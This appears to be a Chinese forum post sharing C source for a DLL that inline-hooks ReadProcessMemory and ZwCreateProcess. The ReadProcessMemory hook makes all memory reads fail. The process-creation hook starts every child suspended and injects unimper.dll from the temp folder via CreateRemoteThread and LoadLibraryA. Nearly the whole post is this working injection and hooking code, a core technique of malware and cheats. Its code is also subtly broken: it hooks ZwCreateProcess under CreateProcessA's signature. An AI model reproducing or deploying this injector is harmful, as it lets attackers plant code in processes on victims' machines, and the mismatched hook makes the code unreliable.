- 注册时间
- 2011-3-6
- 最后登录
- 1970-1-1
该用户从未签到
|
- ////////////////////////////////////
- //功能:hook CreateProcess注入
- ////////////////////////////////////
- #include <windows.h>
- #include <stdio.h>
- #define _CRT_SECURE_NO_DEPRECATE
- #define _CRT_SECURE_NO_WARNINGS
- DWORD org_ReadProcessMemory;
- DWORD org_CreateProcessA;
- HANDLE ghInstance = 0;
- char path[1024];
- int __declspec(naked) __stdcall OrgReadProcessMemory(
- HANDLE hProcess, // handle to the process
- LPCVOID lpBaseAddress, // base of memory area
- LPVOID lpBuffer, // data buffer
- DWORD nSize, // number of bytes to read
- LPDWORD lpNumberOfBytesRead // number of bytes read
- )
- {
- __asm {
- mov edi,edi
- push ebp
- mov ebp,esp
- jmp [org_ReadProcessMemory]
- }
- }
- char tmp1[255];
- BOOL __stdcall MyReadProcessMemory(
- HANDLE hProcess, // handle to the process
- LPCVOID lpBaseAddress, // base of memory area
- LPVOID lpBuffer, // data buffer
- DWORD nSize, // number of bytes to read
- LPDWORD lpNumberOfBytesRead // number of bytes read
- )
- {
- // sprintf(tmp1,"P-[%d]%08X",nSize,lpBaseAddress);OutputDebugString(tmp1);
- //DWORD ret=OrgReadProcessMemory(hProcess, lpBaseAddress, lpBuffer, nSize, lpNumberOfBytesRead);
- //return ret;
- return 0;
- }
- int __declspec(naked) __stdcall OrgCreateProcessA(
- LPCTSTR lpApplicationName, // name of executable module
- LPTSTR lpCommandLine, // command line string
- LPSECURITY_ATTRIBUTES lpProcessAttributes, // SD
- LPSECURITY_ATTRIBUTES lpThreadAttributes, // SD
- BOOL bInheritHandles, // handle inheritance option
- DWORD dwCreationFlags, // creation flags
- LPVOID lpEnvironment, // new environment block
- LPCTSTR lpCurrentDirectory, // current directory name
- LPSTARTUPINFO lpStartupInfo, // startup information
- LPPROCESS_INFORMATION lpProcessInformation // process information
- )
- {
- __asm {
- mov edi,edi
- push ebp
- mov ebp,esp
- jmp [org_CreateProcessA]
- }
- }
- char tmp2[255];
- BOOL __stdcall MyCreateProcessA(
- LPCTSTR lpApplicationName, // name of executable module
- LPTSTR lpCommandLine, // command line string
- LPSECURITY_ATTRIBUTES lpProcessAttributes, // SD
- LPSECURITY_ATTRIBUTES lpThreadAttributes, // SD
- BOOL bInheritHandles, // handle inheritance option
- DWORD dwCreationFlags, // creation flags
- LPVOID lpEnvironment, // new environment block
- LPCTSTR lpCurrentDirectory, // current directory name
- LPSTARTUPINFO lpStartupInfo, // startup information
- LPPROCESS_INFORMATION lpProcessInformation // process information
- )
- {
- //MessageBox(0,lpCommandLine,lpApplicationName,0);
-
- BOOL ret=OrgCreateProcessA(
- lpApplicationName, // name of executable module
- lpCommandLine, // command line string
- lpProcessAttributes, // SD
- lpThreadAttributes, // SD
- bInheritHandles, // handle inheritance option
- CREATE_SUSPENDED, // creation flags
- lpEnvironment, // new environment block
- lpCurrentDirectory, // current directory name
- lpStartupInfo, // startup information
- lpProcessInformation // process information
- );
- ;
- GetTempPath(255,path);
- strcat(path,"unimper.dll");
- //MessageBox(0,path,"tip",0);
- DWORD size = strlen( path ) + 1;
- LPVOID buf = VirtualAllocEx( lpProcessInformation->hProcess, NULL, size, MEM_COMMIT, PAGE_READWRITE );
- if ( NULL == buf )
- {
- MessageBox(0,"Alloc Memery Failed!\n",0,0);
- CloseHandle( lpProcessInformation->hProcess );
- }
- DWORD dwWritten;
- if ( WriteProcessMemory( lpProcessInformation->hProcess, buf, (PVOID)path, size, &dwWritten ) )
- {
- // 要写入字节数与实际写入字节数不相等,仍属失败
- if ( dwWritten != size )
- {
- MessageBox(0,"Alloc Memery Failed!!!!!!!!!!!!!!!!!!\n",0,0);
- VirtualFreeEx( lpProcessInformation->hProcess, buf, size, MEM_DECOMMIT );
- CloseHandle( lpProcessInformation->hProcess );
- }
- }
- else
- {
- MessageBox(0,"Alloc Memery Failed!\n",0,0);
- CloseHandle( lpProcessInformation->hProcess );
- }
- LPVOID pLoadLibrary = (LPVOID)GetProcAddress(GetModuleHandle("kernel32.dll"), "LoadLibraryA");
- DWORD dwThreadId;
- //
- HANDLE hThread = CreateRemoteThread( lpProcessInformation->hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)pLoadLibrary, buf, 0 , &dwThreadId );
- WaitForSingleObject( hThread, INFINITE );
- VirtualFreeEx( lpProcessInformation->hProcess, buf, size, MEM_DECOMMIT );
- CloseHandle( hThread );
- ResumeThread (lpProcessInformation->hThread);
-
-
- return ret;
-
-
-
-
- //return 0;
- }
- BOOL WINAPI DllMain(HINSTANCE hinstModule, DWORD dwReason, LPVOID lpvReserved)
- {
- if(dwReason == DLL_PROCESS_ATTACH)
- {
-
- HANDLE hMutex = CreateMutex(NULL, false, "Process");
- if (GetLastError() == ERROR_ALREADY_EXISTS)
- {
-
- DWORD pReadProcessMemory = (DWORD)GetProcAddress(GetModuleHandle("kernel32.dll"), "ReadProcessMemory");
- DWORD pCreateProcessA = (DWORD)GetProcAddress(GetModuleHandle("ntdll.dll"), "ZwCreateProcess");
- DWORD oldflag;
- VirtualProtect((PVOID)pReadProcessMemory, 5, PAGE_EXECUTE_READWRITE, &oldflag);
- VirtualProtect((PVOID)pCreateProcessA, 5, PAGE_EXECUTE_READWRITE, &oldflag);
- *(PCHAR)pReadProcessMemory = '\xE9';
- *(PCHAR)pCreateProcessA = '\xE9';
- *(DWORD*)(pReadProcessMemory+1) = (DWORD)MyReadProcessMemory - (pReadProcessMemory+5);
- *(DWORD*)(pCreateProcessA+1) = (DWORD)MyCreateProcessA - (pCreateProcessA+5);
- org_ReadProcessMemory = pReadProcessMemory+ 5;
- org_CreateProcessA = pCreateProcessA+ 5;
- CloseHandle(hMutex);
- }
- else
- {
- return 0;
-
- }
- }
- return true;
- }
复制代码 |
|